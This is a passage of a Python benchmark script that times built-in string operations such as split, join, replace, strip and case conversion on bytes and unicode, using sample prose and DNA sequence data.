s1_rpartition(s2)
@bench('s="ABC"*33; ("E"+s+("D"+s)*500).rpartition("E"+s)',
"late match, 100 characters", 100)
def rpartition_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = e + m + (d+m)*500
s2 = e + m
s1_rpartition = s1.rpartition
for x in _RANGE_100:
s1_rpartition(s2)
#### Same for split(s, 1)
@bench('("A"*1000).split("A", 1)', "early match, single character", 1000)
def split_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_split = s1.split
for x in _RANGE_1000:
s1_split(s2, 1)
@bench('("A"*1000).split("B", 1)', "no match, single character", 1000)
def split_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_split = s1.split
for x in _RANGE_1000:
s1_split(s2, 1)
@bench('("AB"*1000).split("AB", 1)', "early match, two characters", 1000)
def split_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_split = s1.split
for x in _RANGE_1000:
s1_split(s2, 1)
@bench('("AB"*1000).split("BC", 1)', "no match, two characters", 1000)
def split_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_split = s1.split
for x in _RANGE_1000:
s1_split(s2, 1)
@bench('("AB"*300+"C").split("BC", 1)', "late match, two characters", 1000)
def split_test_slow_match_two_characters(STR):
s1 = STR("AB" * 300+"C")
s2 = STR("BC")
s1_split = s1.split
for x in _RANGE_1000:
s1_split(s2, 1)
@bench('s="ABC"*33; ((s+"D")*500+s+"E").split(s+"E", 1)',
"late match, 100 characters", 100)
def split_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*500 + m+e
s2 = m+e
s1_split = s1.split
for x in _RANGE_100:
s1_split(s2, 1)
#### Same for rsplit(s, 1)
@bench('("A"*1000).rsplit("A", 1)', "early match, single character", 1000)
def rsplit_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_rsplit = s1.rsplit
for x in _RANGE_1000:
s1_rsplit(s2, 1)
@bench('("A"*1000).rsplit("B", 1)', "no match, single character", 1000)
def rsplit_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_rsplit = s1.rsplit
for x in _RANGE_1000:
s1_rsplit(s2, 1)
@bench('("AB"*1000).rsplit("AB", 1)', "early match, two characters", 1000)
def rsplit_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_rsplit = s1.rsplit
for x in _RANGE_1000:
s1_rsplit(s2, 1)
@bench('("AB"*1000).rsplit("BC", 1)', "no match, two characters", 1000)
def rsplit_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_rsplit = s1.rsplit
for x in _RANGE_1000:
s1_rsplit(s2, 1)
@bench('("C"+"AB"*300).rsplit("CA", 1)', "late match, two characters", 1000)
def rsplit_test_slow_match_two_characters(STR):
s1 = STR("C" + "AB" * 300)
s2 = STR("CA")
s1_rsplit = s1.rsplit
for x in _RANGE_1000:
s1_rsplit(s2, 1)
@bench('s="ABC"*33; ("E"+s+("D"+s)*500).rsplit("E"+s, 1)',
"late match, 100 characters", 100)
def rsplit_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = e + m + (d+m)*500
s2 = e + m
s1_rsplit = s1.rsplit
for x in _RANGE_100:
s1_rsplit(s2, 1)
#### Benchmark the operator-based methods
@bench('"A"*10', "repeat 1 character 10 times", 1000)
def repeat_single_10_times(STR):
s = STR("A")
for x in _RANGE_1000:
s * 10
@bench('"A"*1000', "repeat 1 character 1000 times", 1000)
def repeat_single_1000_times(STR):
s = STR("A")
for x in _RANGE_1000:
s * 1000
@bench('"ABCDE"*10', "repeat 5 characters 10 times", 1000)
def repeat_5_10_times(STR):
s = STR("ABCDE")
for x in _RANGE_1000:
s * 10
@bench('"ABCDE"*1000', "repeat 5 characters 1000 times", 1000)
def repeat_5_1000_times(STR):
s = STR("ABCDE")
for x in _RANGE_1000:
s * 1000
# + for concat
@bench('"Andrew"+"Dalke"', "concat two strings", 1000)
def concat_two_strings(STR):
s1 = STR("Andrew")
s2 = STR("Dalke")
for x in _RANGE_1000:
s1+s2
@bench('s1+s2+s3+s4+...+s20', "concat 20 strings of words length 4 to 15",
1000)
def concat_many_strings(STR):
s1=STR('TIXSGYNREDCVBHJ')
s2=STR('PUMTLXBZVDO')
s3=STR('FVZNJ')
s4=STR('OGDXUW')
s5=STR('WEIMRNCOYVGHKB')
s6=STR('FCQTNMXPUZH')
s7=STR('TICZJYRLBNVUEAK')
s8=STR('REYB')
s9=STR('PWUOQ')
s10=STR('EQHCMKBS')
s11=STR('AEVDFOH')
s12=STR('IFHVD')
s13=STR('JGTCNLXWOHQ')
s14=STR('ITSKEPYLROZAWXF')
s15=STR('THEK')
s16=STR('GHPZFBUYCKMNJIT')
s17=STR('JMUZ')
s18=STR('WLZQMTB')
s19=STR('KPADCBW')
s20=STR('TNJHZQAGBU')
for x in _RANGE_1000:
(s1 + s2+ s3+ s4+ s5+ s6+ s7+ s8+ s9+s10+
s11+s12+s13+s14+s15+s16+s17+s18+s19+s20)
#### Benchmark join
def get_bytes_yielding_seq(STR, arg):
if STR is BYTES and sys.version_info >= (3,):
raise UnsupportedType
return STR(arg)
@bench('"A".join("")',
"join empty string, with 1 character sep", 100)
def join_empty_single(STR):
sep = STR("A")
s2 = get_bytes_yielding_seq(STR, "")
sep_join = sep.join
for x in _RANGE_100:
sep_join(s2)
@bench('"ABCDE".join("")',
"join empty string, with 5 character sep", 100)
def join_empty_5(STR):
sep = STR("ABCDE")
s2 = get_bytes_yielding_seq(STR, "")
sep_join = sep.join
for x in _RANGE_100:
sep_join(s2)
@bench('"A".join("ABC..Z")',
"join string with 26 characters, with 1 character sep", 1000)
def join_alphabet_single(STR):
sep = STR("A")
s2 = get_bytes_yielding_seq(STR, "ABCDEFGHIJKLMnOPQRSTUVWXYZ")
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
@bench('"ABCDE".join("ABC..Z")',
"join string with 26 characters, with 5 character sep", 1000)
def join_alphabet_5(STR):
sep = STR("ABCDE")
s2 = get_bytes_yielding_seq(STR, "ABCDEFGHIJKLMnOPQRSTUVWXYZ")
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
@bench('"A".join(list("ABC..Z"))',
"join list of 26 characters, with 1 character sep", 1000)
def join_alphabet_list_single(STR):
sep = STR("A")
s2 = [STR(x) for x in "ABCDEFGHIJKLMnOPQRSTUVWXYZ"]
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
@bench('"ABCDE".join(list("ABC..Z"))',
"join list of 26 characters, with 5 character sep", 1000)
def join_alphabet_list_five(STR):
sep = STR("ABCDE")
s2 = [STR(x) for x in "ABCDEFGHIJKLMnOPQRSTUVWXYZ"]
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
@bench('"A".join(["Bob"]*100))',
"join list of 100 words, with 1 character sep", 1000)
def join_100_words_single(STR):
sep = STR("A")
s2 = [STR("Bob")]*100
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
@bench('"ABCDE".join(["Bob"]*100))',
"join list of 100 words, with 5 character sep", 1000)
def join_100_words_5(STR):
sep = STR("ABCDE")
s2 = [STR("Bob")]*100
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
#### split tests
@bench('("Here are some words. "*2).split()', "split whitespace (small)", 1000)
def whitespace_split(STR):
s = STR("Here are some words. "*2)
s_split = s.split
for x in _RANGE_1000:
s_split()
@bench('("Here are some words. "*2).rsplit()', "split whitespace (small)", 1000)
def whitespace_rsplit(STR):
s = STR("Here are some words. "*2)
s_rsplit = s.rsplit
for x in _RANGE_1000:
s_rsplit()
@bench('("Here are some words. "*2).split(None, 1)',
"split 1 whitespace", 1000)
def whitespace_split_1(STR):
s = STR("Here are some words. "*2)
s_split = s.split
N = None
for x in _RANGE_1000:
s_split(N, 1)
@bench('("Here are some words. "*2).rsplit(None, 1)',
"split 1 whitespace", 1000)
def whitespace_rsplit_1(STR):
s = STR("Here are some words. "*2)
s_rsplit = s.rsplit
N = None
for x in _RANGE_1000:
s_rsplit(N, 1)
@bench('("Here are some words. "*2).partition(" ")',
"split 1 whitespace", 1000)
def whitespace_partition(STR):
sep = STR(" ")
s = STR("Here are some words. "*2)
s_partition = s.partition
for x in _RANGE_1000:
s_partition(sep)
@bench('("Here are some words. "*2).rpartition(" ")',
"split 1 whitespace", 1000)
def whitespace_rpartition(STR):
sep = STR(" ")
s = STR("Here are some words. "*2)
s_rpartition = s.rpartition
for x in _RANGE_1000:
s_rpartition(sep)
human_text = """\
Python is a dynamic object-oriented programming language that can be
used for many kinds of software development. It offers strong support
for integration with other languages and tools, comes with extensive
standard libraries, and can be learned in a few days. Many Python
programmers report substantial productivity gains and feel the language
encourages the development of higher quality, more maintainable code.
Python runs on Windows, Linux/Unix, Mac OS X, Amiga, Palm
Handhelds, and Nokia mobile phones. Python has also been ported to the
Java and .NET virtual machines.
Python is distributed under an OSI-approved open source license that
makes it free to use, even for commercial products.
"""*25
human_text_bytes = bytes_from_str(human_text)
human_text_unicode = unicode_from_str(human_text)
def _get_human_text(STR):
if STR is UNICODE:
return human_text_unicode
if STR is BYTES:
return human_text_bytes
raise AssertionError
@bench('human_text.split()', "split whitespace (huge)", 10)
def whitespace_split_huge(STR):
s = _get_human_text(STR)
s_split = s.split
for x in _RANGE_10:
s_split()
@bench('human_text.rsplit()', "split whitespace (huge)", 10)
def whitespace_rsplit_huge(STR):
s = _get_human_text(STR)
s_rsplit = s.rsplit
for x in _RANGE_10:
s_rsplit()
@bench('"this\\nis\\na\\ntest\\n".split("\\n")', "split newlines", 1000)
def newlines_split(STR):
s = STR("this\nis\na\ntest\n")
s_split = s.split
nl = STR("\n")
for x in _RANGE_1000:
s_split(nl)
@bench('"this\\nis\\na\\ntest\\n".rsplit("\\n")', "split newlines", 1000)
def newlines_rsplit(STR):
s = STR("this\nis\na\ntest\n")
s_rsplit = s.rsplit
nl = STR("\n")
for x in _RANGE_1000:
s_rsplit(nl)
@bench('"this\\nis\\na\\ntest\\n".splitlines()', "split newlines", 1000)
def newlines_splitlines(STR):
s = STR("this\nis\na\ntest\n")
s_splitlines = s.splitlines
for x in _RANGE_1000:
s_splitlines()
## split text with 2000 newlines
def _make_2000_lines():
import random
r = random.Random(100)
chars = list(map(chr, range(32, 128)))
i = 0
while i < len(chars):
chars[i] = " "
i += r.randrange(9)
s = "".join(chars)
s = s*4
words = []
for i in range(2000):
start = r.randrange(96)
n = r.randint(5, 65)
words.append(s[start:start+n])
return "\n".join(words)+"\n"
_text_with_2000_lines = _make_2000_lines()
_text_with_2000_lines_bytes = bytes_from_str(_text_with_2000_lines)
_text_with_2000_lines_unicode = unicode_from_str(_text_with_2000_lines)
def _get_2000_lines(STR):
if STR is UNICODE:
return _text_with_2000_lines_unicode
if STR is BYTES:
return _text_with_2000_lines_bytes
raise AssertionError
@bench('"...text...".split("\\n")', "split 2000 newlines", 10)
def newlines_split_2000(STR):
s = _get_2000_lines(STR)
s_split = s.split
nl = STR("\n")
for x in _RANGE_10:
s_split(nl)
@bench('"...text...".rsplit("\\n")', "split 2000 newlines", 10)
def newlines_rsplit_2000(STR):
s = _get_2000_lines(STR)
s_rsplit = s.rsplit
nl = STR("\n")
for x in _RANGE_10:
s_rsplit(nl)
@bench('"...text...".splitlines()', "split 2000 newlines", 10)
def newlines_splitlines_2000(STR):
s = _get_2000_lines(STR)
s_splitlines = s.splitlines
for x in _RANGE_10:
s_splitlines()
## split text on "--" characters
@bench(
'"this--is--a--test--of--the--emergency--broadcast--system".split("--")',
"split on multicharacter separator (small)", 1000)
def split_multichar_sep_small(STR):
s = STR("this--is--a--test--of--the--emergency--broadcast--system")
s_split = s.split
pat = STR("--")
for x in _RANGE_1000:
s_split(pat)
@bench(
'"this--is--a--test--of--the--emergency--broadcast--system".rsplit("--")',
"split on multicharacter separator (small)", 1000)
def rsplit_multichar_sep_small(STR):
s = STR("this--is--a--test--of--the--emergency--broadcast--system")
s_rsplit = s.rsplit
pat = STR("--")
for x in _RANGE_1000:
s_rsplit(pat)
## split dna text on "ACTAT" characters
@bench('dna.split("ACTAT")',
"split on multicharacter separator (dna)", 10)
def split_multichar_sep_dna(STR):
s = _get_dna(STR)
s_split = s.split
pat = STR("ACTAT")
for x in _RANGE_10:
s_split(pat)
@bench('dna.rsplit("ACTAT")',
"split on multicharacter separator (dna)", 10)
def rsplit_multichar_sep_dna(STR):
s = _get_dna(STR)
s_rsplit = s.rsplit
pat = STR("ACTAT")
for x in _RANGE_10:
s_rsplit(pat)
## split with limits
GFF3_example = "\t".join([
"I", "Genomic_canonical", "region", "357208", "396183", ".", "+", ".",
"ID=Sequence:R119;note=Clone R119%3B Genbank AF063007;Name=R119"])
@bench('GFF3_example.split("\\t")', "tab split", 1000)
def tab_split_no_limit(STR):
sep = STR("\t")
s = STR(GFF3_example)
s_split = s.split
for x in _RANGE_1000:
s_split(sep)
@bench('GFF3_example.split("\\t", 8)', "tab split", 1000)
def tab_split_limit(STR):
sep = STR("\t")
s = STR(GFF3_example)
s_split = s.split
for x in _RANGE_1000:
s_split(sep, 8)
@bench('GFF3_example.rsplit("\\t")', "tab split", 1000)
def tab_rsplit_no_limit(STR):
sep = STR("\t")
s = STR(GFF3_example)
s_rsplit = s.rsplit
for x in _RANGE_1000:
s_rsplit(sep)
@bench('GFF3_example.rsplit("\\t", 8)', "tab split", 1000)
def tab_rsplit_limit(STR):
sep = STR("\t")
s = STR(GFF3_example)
s_rsplit = s.rsplit
for x in _RANGE_1000:
s_rsplit(sep, 8)
#### Count characters
@bench('...text.with.2000.newlines.count("\\n")',
"count newlines", 10)
def count_newlines(STR):
s = _get_2000_lines(STR)
s_count = s.count
nl = STR("\n")
for x in _RANGE_10:
s_count(nl)
# Orchid sequences concatenated, from Biopython
_dna = """
CGTAACAAGGTTTCCGTAGGTGAACCTGCGGAAGGATCATTGTTGAGATCACATAATAATTGATCGGGTT
AATCTGGAGGATCTGTTTACTTTGGTCACCCATGAGCATTTGCTGTTGAAGTGACCTAGAATTGCCATCG
AGCCTCCTTGGGAGCTTTCTTGTTGGCGAGATCTAAACCCTTGCCCGGCGCAGTTTTGCTCCAAGTCGTT
TGACACATAATTGGTGAAGGGGGTGGCATCCTTCCCTGACCCTCCCCCAACTATTTTTTTAACAACTCTC
AGCAACGGAGACTCAGTCTTCGGCAAATGCGATAAATGGTGTGAATTGCAGAATCCCGTGCACCATCGAG
TCTTTGAACGCAAGTTGCGCCCGAGGCCATCAGGCCAAGGGCACGCCTGCCTGGGCATTGCGAGTCATAT
CTCTCCCTTAACGAGGCTGTCCATACATACTGTTCAGCCGGTGCGGATGTGAGTTTGGCCCCTTGTTCTT
TGGTACGGGGGGTCTAAGAGCTGCATGGGCTTTTGATGGTCCTAAATACGGCAAGAGGTGGACGAACTAT
GCTACAACAAAATTGTTGTGCAGAGGCCCCGGGTTGTCGTATTAGATGGGCCACCGTAATCTGAAGACCC
TTTTGAACCCCATTGGAGGCCCATCAACCCATGATCAGTTGATGGCCATTTGGTTGCGACCCCAGGTCAG
GTGAGCAACAGCTGTCGTAACAAGGTTTCCGTAGGGTGAACTGCGGAAGGATCATTGTTGAGATCACATA
ATAATTGATCGAGTTAATCTGGAGGATCTGTTTACTTGGGTCACCCATGGGCATTTGCTGTTGAAGTGAC
CTAGATTTGCCATCGAGCCTCCTTGGGAGCATCCTTGTTGGCGATATCTAAACCCTCAATTTTTCCCCCA
ATCAAATTACACAAAATTGGTGGAGGGGGTGGCATTCTTCCCTTACCCTCCCCCAAATATTTTTTTAACA
ACTCTCAGCAACGGATATCTCAGCTCTTGCATCGATGAAGAACCCACCGAAATGCGATAAATGGTGTGAA
TTGCAGAATCCCGTGAACCATCGAGTCTTTGAACGCAAGTTGCGCCCGAGGCCATCAGGCCAAGGGCACG
CCTGCCTGGGCATTGCGAGTCATATCTCTCCCTTAACGAGGCTGTCCATACATACTGTTCAGCCGGTGCG
GATGTGAGTTTGGCCCCTTGTTCTTTGGTACGGGGGGTCTAAGAGATGCATGGGCTTTTGATGGTCCTAA
ATACGGCAAGAGGTGGACGAACTATGCTACAACAAAATTGTTGTGCAAAGGCCCCGGGTTGTCGTATAAG
ATGGGCCACCGATATCTGAAGACCCTTTTGGACCCCATTGGAGCCCATCAACCCATGTCAGTTGATGGCC
ATTCGTAACAAGGTTTCCGTAGGTGAACCTGCGGAAGGATCATTGTTGAGATCACATAATAATTGATCGA
GTTAATCTGGAGGATCTGTTTACTTGGGTCACCCATGGGCATTTGCTGTTGAAGTGACCTAGATTTGCCA
TCGAGCCTCCTTGGGAGCTTTCTTGTTGGCGATATCTAAACCCTTGCCCGGCAGAGTTTTGGGAATCCCG
TGAACCATCGAGTCTTTGAACGCAAGTTGCGCCCGAGGCCATCAGGCCAAGGGCACGCCTGCCTGGGCAT
TGCGAGTCATATCTCTCCCTTAACGAGGCTGTCCATACACACCTGTTCAGCCGGTGCGGATGTGAGTTTG
GCCCCTTGTTCTTTGGTACGGGGGGTCTAAGAGCTGCATGGGCTTTTGATGGTCCTAAATACGGCAAGAG
GTGGACGAACTATGCTACAACAAAATTGTTGTGCAAAGGCCCCGGGTTGTCGTATTAGATGGGCCACCAT
AATCTGAAGACCCTTTTGAACCCCATTGGAGGCCCATCAACCCATGATCAGTTGATGGCCATTTGGTTGC
GACCCAGTCAGGTGAGGGTAGGTGAACCTGCGGAAGGATCATTGTTGAGATCACATAATAATTGATCGAG
TTAATCTGGAGGATCTGTTTACTTTGGTCACCCATGGGCATTTGCTGTTGAAGTGACCTAGATTTGCCAT
CGAGCCTCCTTGGGAGCTTTCTTGTTGGCGAGATCTAAACCCTTGCCCGGCGGAGTTTGGCGCCAAGTCA
TATGACACATAATTGGTGAAGGGGGTGGCATCCTGCCCTGACCCTCCCCAAATTATTTTTTTAACAACTC
TCAGCAACGGATATCTCGGCTCTTGCATCGATGAAGAACGCAGCGAAATGCGATAAATGGTGTGAATTGC
AGAATCCCGTGAACCATCGAGTCTTTGGAACGCAAGTTGCGCCCGAGGCCATCAGGCCAAGGGCACGCCT
GCCTGGGCATTGGGAATCATATCTCTCCCCTAACGAGGCTATCCAAACATACTGTTCATCCGGTGCGGAT
GTGAGTTTGGCCCCTTGTTCTTTGGTACCGGGGGTCTAAGAGCTGCATGGGCATTTGATGGTCCTCAAAA
CGGCAAGAGGTGGACGAACTATGCCACAACAAAATTGTTGTCCCAAGGCCCCGGGTTGTCGTATTAGATG
GGCCACCGTAACCTGAAGACCCTTTTGAACCCCATTGGAGGCCCATCAACCCATGATCAGTTGATGACCA
TTTGTTGCGACCCCAGTCAGCTGAGCAACCCGCTGAGTGGAAGGTCATTGCCGATATCACATAATAATTG
ATCGAGTTAATCTGGAGGATCTGTTTACTTGGTCACCCATGAGCATTTGCTGTTGAAGTGACCTAGATTT
GCCATCGAGCCTCCTTGGGAGTTTTCTTGTTGGCGAGATCTAAACCCTTGCCCGGCGGAGTTGTGCGCCA
AGTCATATGACACATAATTGGTGAAGGGGGTGGCATCCTGCCCTGACCCTCCCCAAATTATTTTTTTAAC
AACTCTCAGCAACGGATATCTCGGCTCTTGCATCGATGAAGAACGCAGCGAAATGCGATAAATGGTGTGA
ATTGCAGAATCCCGTGAACCATCGAGTCTTTGAACGCAAGTTGCGCCCGAGGCCATCAGGCCAAGGGCAC
GCCTGCCTGGGCATTGCGAGTCATATCTCTCCCTTAACGAGGCTGTCCATACATACTGTTCATCCGGTGC
GGATGTGAGTTTGGCCCCTTGTTCTTTGGTACGGGGGGTCTAAGAGCTGCATGGGCATTTGATGGTCCTC
AAAACGGCAAGAGGTGGACGAACTATGCTACAACCAAATTGTTGTCCCAAGGCCCCGGGTTGTCGTATTA
GATGGGCCACCGTAACCTGAAGACCCTTTTGAACCCCATTGGAGGCCCATCAACCCATGATCAGTTGATG
ACCATGTGTTGCGACCCCAGTCAGCTGAGCAACGCGCTGAGCGTAACAAGGTTTCCGTAGGTGGACCTCC
GGGAGGATCATTGTTGAGATCACATAATAATTGATCGAGGTAATCTGGAGGATCTGCATATTTTGGTCAC
"""
_dna = "".join(_dna.splitlines())
_dna = _dna * 25
_dna_bytes = bytes_from_str(_dna)
_dna_unicode = unicode_from_str(_dna)
def _get_dna(STR):
if STR is UNICODE:
return _dna_unicode
if STR is BYTES:
return _dna_bytes
raise AssertionError
@bench('dna.count("AACT")', "count AACT substrings in DNA example", 10)
def count_aact(STR):
seq = _get_dna(STR)
seq_count = seq.count
needle = STR("AACT")
for x in _RANGE_10:
seq_count(needle)
##### startswith and endswith
@bench('"Andrew".startswith("A")', 'startswith single character', 1000)
def startswith_single(STR):
s1 = STR("Andrew")
s2 = STR("A")
s1_startswith = s1.startswith
for x in _RANGE_1000:
s1_startswith(s2)
@bench('"Andrew".startswith("Andrew")', 'startswith multiple characters',
1000)
def startswith_multiple(STR):
s1 = STR("Andrew")
s2 = STR("Andrew")
s1_startswith = s1.startswith
for x in _RANGE_1000:
s1_startswith(s2)
@bench('"Andrew".startswith("Anders")',
'startswith multiple characters - not!', 1000)
def startswith_multiple_not(STR):
s1 = STR("Andrew")
s2 = STR("Anders")
s1_startswith = s1.startswith
for x in _RANGE_1000:
s1_startswith(s2)
# endswith
@bench('"Andrew".endswith("w")', 'endswith single character', 1000)
def endswith_single(STR):
s1 = STR("Andrew")
s2 = STR("w")
s1_endswith = s1.endswith
for x in _RANGE_1000:
s1_endswith(s2)
@bench('"Andrew".endswith("Andrew")', 'endswith multiple characters', 1000)
def endswith_multiple(STR):
s1 = STR("Andrew")
s2 = STR("Andrew")
s1_endswith = s1.endswith
for x in _RANGE_1000:
s1_endswith(s2)
@bench('"Andrew".endswith("Anders")',
'endswith multiple characters - not!', 1000)
def endswith_multiple_not(STR):
s1 = STR("Andrew")
s2 = STR("Anders")
s1_endswith = s1.endswith
for x in _RANGE_1000:
s1_endswith(s2)
#### Strip
@bench('"Hello!\\n".strip()', 'strip terminal newline', 1000)
def terminal_newline_strip_right(STR):
s = STR("Hello!\n")
s_strip = s.strip
for x in _RANGE_1000:
s_strip()
@bench('"Hello!\\n".rstrip()', 'strip terminal newline', 1000)
def terminal_newline_rstrip(STR):
s = STR("Hello!\n")
s_rstrip = s.rstrip
for x in _RANGE_1000:
s_rstrip()
@bench('"\\nHello!".strip()', 'strip terminal newline', 1000)
def terminal_newline_strip_left(STR):
s = STR("\nHello!")
s_strip = s.strip
for x in _RANGE_1000:
s_strip()
@bench('"\\nHello!\\n".strip()', 'strip terminal newline', 1000)
def terminal_newline_strip_both(STR):
s = STR("\nHello!\n")
s_strip = s.strip
for x in _RANGE_1000:
s_strip()
@bench('"\\nHello!".rstrip()', 'strip terminal newline', 1000)
def terminal_newline_lstrip(STR):
s = STR("\nHello!")
s_lstrip = s.lstrip
for x in _RANGE_1000:
s_lstrip()
@bench('s="Hello!\\n"; s[:-1] if s[-1]=="\\n" else s',
'strip terminal newline', 1000)
def terminal_newline_if_else(STR):
s = STR("Hello!\n")
NL = STR("\n")
for x in _RANGE_1000:
s[:-1] if (s[-1] == NL) else s
# Strip multiple spaces or tabs
@bench('"Hello\\t \\t".strip()', 'strip terminal spaces and tabs', 1000)
def terminal_space_strip(STR):
s = STR("Hello\t \t!")
s_strip = s.strip
for x in _RANGE_1000:
s_strip()
@bench('"Hello\\t \\t".rstrip()', 'strip terminal spaces and tabs', 1000)
def terminal_space_rstrip(STR):
s = STR("Hello!\t \t")
s_rstrip = s.rstrip
for x in _RANGE_1000:
s_rstrip()
@bench('"\\t \\tHello".rstrip()', 'strip terminal spaces and tabs', 1000)
def terminal_space_lstrip(STR):
s = STR("\t \tHello!")
s_lstrip = s.lstrip
for x in _RANGE_1000:
s_lstrip()
#### replace
@bench('"This is a test".replace(" ", "\\t")', 'replace single character',
1000)
def replace_single_character(STR):
s = STR("This is a test!")
from_str = STR(" ")
to_str = STR("\t")
s_replace = s.replace
for x in _RANGE_1000:
s_replace(from_str, to_str)
@uses_re
@bench('re.sub(" ", "\\t", "This is a test"', 'replace single character',
1000)
def replace_single_character_re(STR):
s = STR("This is a test!")
pat = re.compile(STR(" "))
to_str = STR("\t")
pat_sub = pat.sub
for x in _RANGE_1000:
pat_sub(to_str, s)
@bench('"...text.with.2000.lines...replace("\\n", " ")',
'replace single character, big string', 10)
def replace_single_character_big(STR):
s = _get_2000_lines(STR)
from_str = STR("\n")
to_str = STR(" ")
s_replace = s.replace
for x in _RANGE_10:
s_replace(from_str, to_str)
@uses_re
@bench('re.sub("\\n", " ", "...text.with.2000.lines...")',
'replace single character, big string', 10)
def replace_single_character_big_re(STR):
s = _get_2000_lines(STR)
pat = re.compile(STR("\n"))
to_str = STR(" ")
pat_sub = pat.sub
for x in _RANGE_10:
pat_sub(to_str, s)
@bench('dna.replace("ATC", "ATT")',
'replace multiple characters, dna', 10)
def replace_multiple_characters_dna(STR):
seq = _get_dna(STR)
from_str = STR("ATC")
to_str = STR("ATT")
seq_replace = seq.replace
for x in _RANGE_10:
seq_replace(from_str, to_str)
# This increases the character count
@bench('"...text.with.2000.newlines...replace("\\n", "\\r\\n")',
'replace and expand multiple characters, big string', 10)
def replace_multiple_character_big(STR):
s = _get_2000_lines(STR)
from_str = STR("\n")
to_str = STR("\r\n")
s_replace = s.replace
for x in _RANGE_10:
s_replace(from_str, to_str)
# This decreases the character count
@bench('"When shall we three meet again?".replace("ee", "")',
'replace/remove multiple characters', 1000)
def replace_multiple_character_remove(STR):
s = STR("When shall we three meet again?")
from_str = STR("ee")
to_str = STR("")
s_replace = s.replace
for x in _RANGE_1000:
s_replace(from_str, to_str)
big_s = "A" + ("Z"*128*1024)
big_s_bytes = bytes_from_str(big_s)
big_s_unicode = unicode_from_str(big_s)
def _get_big_s(STR):
if STR is UNICODE: return big_s_unicode
if STR is BYTES: return big_s_bytes
raise AssertionError
# The older replace implementation counted all matches in
# the string even when it only needed to make one replacement.
@bench('("A" + ("Z"*128*1024)).replace("A", "BB", 1)',
'quick replace single character match', 10)
def quick_replace_single_match(STR):
s = _get_big_s(STR)
from_str = STR("A")
to_str = STR("BB")
s_replace = s.replace
for x in _RANGE_10:
s_replace(from_str, to_str, 1)
@bench('("A" + ("Z"*128*1024)).replace("AZZ", "BBZZ", 1)',
'quick replace multiple character match', 10)
def quick_replace_multiple_match(STR):
s = _get_big_s(STR)
from_str = STR("AZZ")
to_str = STR("BBZZ")
s_replace = s.replace
for x in _RANGE_10:
s_replace(from_str, to_str, 1)
####
# CCP does a lot of this, for internationalisation of ingame messages.
_format = "The %(thing)s is %(place)s the %(location)s."
_format_dict = { "thing":"THING", "place":"PLACE", "location":"LOCATION", }
_format_bytes = bytes_from_str(_format)
_format_unicode = unicode_from_str(_format)
_format_dict_bytes = dict((bytes_from_str(k), bytes_from_str(v)) for (k,v) in _format_dict.items())
_format_dict_unicode = dict((unicode_from_str(k), unicode_from_str(v)) for (k,v) in _format_dict.items())
def _get_format(STR):
if STR is UNICODE:
return _format_unicode
if STR is BYTES:
if sys.version_info >= (3,):
raise UnsupportedType
return _format_bytes
raise AssertionError
def _get_format_dict(STR):
if STR is UNICODE:
return _format_dict_unicode
if STR is BYTES:
if sys.version_info >= (3,):
raise UnsupportedType
return _format_dict_bytes
raise AssertionError
# Formatting.
@bench('"The %(k1)s is %(k2)s the %(k3)s."%{"k1":"x","k2":"y","k3":"z",}',
'formatting a string type with a dict', 1000)
def format_with_dict(STR):
s = _get_format(STR)
d = _get_format_dict(STR)
for x in _RANGE_1000:
s % d
#### Upper- and lower- case conversion
@bench('("Where in the world is Carmen San Deigo?"*10).lower()',
"case conversion -- rare", 1000)
def lower_conversion_rare(STR):
s = STR("Where in the world is Carmen San Deigo?"*10)
s_lower = s.lower
for x in _RANGE_1000:
s_lower()
@bench('("WHERE IN THE WORLD IS CARMEN SAN DEIGO?"*10).lower()',
"case conversion -- dense", 1000)
def lower_conversion_dense(STR):
s = STR("WHERE IN THE WORLD IS CARMEN SAN DEIGO?"*10)
s_lower = s.lower
for x in _RANGE_1000:
s_lower()
@bench('("wHERE IN THE WORLD IS cARMEN sAN dEIGO?"*10).upper()',
"case conversion -- rare", 1000)
def upper_conversion_rare(STR):
s = STR("Where in the world is Carmen San Deigo?"*10)
s_upper = s.upper
for x in _RANGE_1000:
s_upper()
@bench('("where in the world is carmen san deigo?"*10).upper()',
"case conversion -- dense", 1000)
def upper_conversion_dense(STR):
s = STR("where in the world is carmen san deigo?"*10)
s_upper = s.upper
for x in _RANGE_1000:
s_upper()
# end of benchmarks
#################
class BenchTimer(timeit.Timer):
def best(self, repeat=1):
for i in range(1, 10):
number = 10**i
x = self.timeit(number)
if x > 0.02:
break
times = [x]
for i in range(1, repeat):
times.append(self.timeit(number))
return min(times) / number
def main():
(options, test_names) = parser.parse_args()
if options.bytes_only and options.unicode_only:
raise SystemExit("Only one of --8-bit and --unicode are allowed")
bench_functions = []
for (k,v) in globals().items():
if hasattr(v, "is_bench"):
if test_names:
for name in test_names:
if name in v.group:
break
else:
# Not selected, ignore
continue
if options.skip_re and hasattr(v, "uses_re"):
continue
bench_functions.append( (v.group, k, v) )
bench_functions.sort()
p("bytes\tunicode")
p("(in ms)\t(in ms)\t%\tcomment")
bytes_total = uni_total = 0.0
for title, group in itertools.groupby(bench_functions,
operator.itemgetter(0)):
# Flush buffer before each group
sys.stdout.flush()
p("="*10, title)
for (_, k, v) in group:
if hasattr(v, "is_bench"):
bytes_time = 0.0
bytes_time_s = " - "
if not options.unicode_only:
try:
